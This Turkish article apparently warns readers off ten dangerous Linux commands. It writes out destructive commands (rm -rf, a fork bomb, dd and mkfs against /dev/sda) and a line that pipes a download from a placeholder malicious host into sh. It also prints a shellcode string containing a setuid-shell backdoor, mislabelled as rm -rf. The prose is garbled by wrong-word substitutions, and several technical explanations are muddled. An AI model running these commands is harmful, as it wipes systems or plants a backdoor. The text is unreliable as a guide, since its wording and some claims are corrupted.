Asla Kullanmamanız Gereken 10 Tehlikeli Linux Komutu
Daha evvel Linux işletim sistemi kullandıysanız, platformun Windows'tan daha bağımsız olduğunu biliyorsunuzdur. Linux açık kaynaklı bir …
Daha evvel Linux işletim sistemi kullandıysanız, platformun Windows'tan daha bağımsız olduğunu biliyorsunuzdur. Linux açık kaynaklı bir işletim sistemi ve kullanıcılara farklı süreçler gerçekleştirme konusunda kâfi özgürlüğü sağlıyor. Ancak Linux, birinci defa kullananlar için bir o kadar da şiddetli bir sistem olabilir.
Tıpkı Windows'ta olduğu üzere Linux'ta da farklı süreçleri gerçekleştirmek için kullanabileceğiniz birçok terminal komutu var. Ancak Windows'un tersine, Linux, sisteminize ziyan verebilecek rastgele bir komut çalıştırıp çalıştırmadığınızı onaylamanızı istemiyor. Bu nedenle, aşağıdaki komutlardan kaçınmanızı öneririz.
İşte kullanmanızı önermediğimiz en tehlikeli 10 Linux terminal komutu:
1. rm -rf
rm -rf komutu, bir klasörü ve içeriğini silmek için en süratli yollardan biri. Lakin küçük bir yazım kusuru yahut bilgisizlik, işletim sisteminizde geri dönüşü olmayan bir hasara neden olabilir. rm komutuyla kullanılan seçeneklerden kimileri, rm -r komutunda olduğu üzere, klasörü olduğu üzere siler. Hatta boş klasörü bile siler. rm -f komutu da salt okunur belgeleri ve kök dizinde bulunan tüm evrakları silebilir.
2. : () {: |: &} ;:
Üstteki komut aslında bir fork bomb saldırısı. Ön planda ve art planda bir kere olmak üzere iki kere çağrılan bir işlev tanımlayarak çalışır. Basitçe komutu açıklamak gerekirse; :() ile bir işlev tanımlanır, |: ile işlev kendi içinden çağırılır ve & ile arkaplanda çalışması sağlanır, ; işlevi sonlandırır ve : ile işlev çağırılır. Sistem donuncaya kadar tekrar tekrar çalışmaya devam eder.
3. command> / dev / sda
Üstteki komut, / dev / sda dizinine komutun çıktısını müellif. Komut işlenmemiş dataları muharrir ve dizindeki tüm evraklar işlenmemiş bilgilerle değiştirilir. Böylece blokta toplam bilgi kaybı olur.
4. mv directory / dev / null
Bu komut temel olarak tüm evrakları / dev / null dizinine taşır. Evet, öbür bir deyişle tüm evrakların sistemden kaldırılması manasına gelir.
5. wget http: // malicious_source -O | sh
Üstteki komut, berbat maksatlı bir kaynaktan komut evrakı indirir ve daha sonra sisteminizde çalıştırır. wget komutu belgeyi indirecek ve sh komutu ise indirilen belgeyi sisteminizde açacaktır.
6. Mkfs.ext3 / dev / sda
Bu komut ise sadece 'sda' bloğunu biçimlendirir ve üstteki komutu çalıştırdıktan sonra sabit disk şoförünüzün sıfırlanacağını bilmelisiniz. Veriler silinince sistem kurtarılamaz formda kalır.
7. > File
> File komutu evrak içeriğini hür bırakmak için kullanılır. Şayet bir yazım yanılgısı yahut yanlışlık sonucu > xt.conf olarak yürütülürse, yapılandırma evrakını yahut öbür bir sistem dosyasını yazabilir.
8. ^ foo ^ bar
Bu komut, tüm komutu yine yazmanıza gerek kalmadan evvelki komutu düzenlemek için kullanılır. Ancak komutu kullanarak evvelki komuttaki değişikliği dikkatlice denetim etmezseniz risk alırsınız ve hakikaten sıkıntılı olabilir.
9. dd if = / dev / random of = / dev / sda
Üstteki komutu / dev / sda olarak bitirirseniz ve blok için rastgele data yazacaktır. Alışılmış ki bunun sonucunda sisteminiz tutarsız ve kurtarılamaz bir noktaya gelecek.
10. Görünmez Komutlar
Aşağıdaki komut, aslında bu yazıdaki birinci komuttan (rm-rf) diğer bir şey değil. Kodu terminale yazmanız halinde kök dizini tertemiz yapar çıkarsınız. Aslında tehdidin gizlenebileceğini ve bazen bazen tespit edilemeyeceğini gösteriyor. Ne yaptığınızı ve sonucun ne olacağını bilemezsiniz. Bilinmeyen bir kaynaktan kod derleme / çalıştırma yapmayın.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;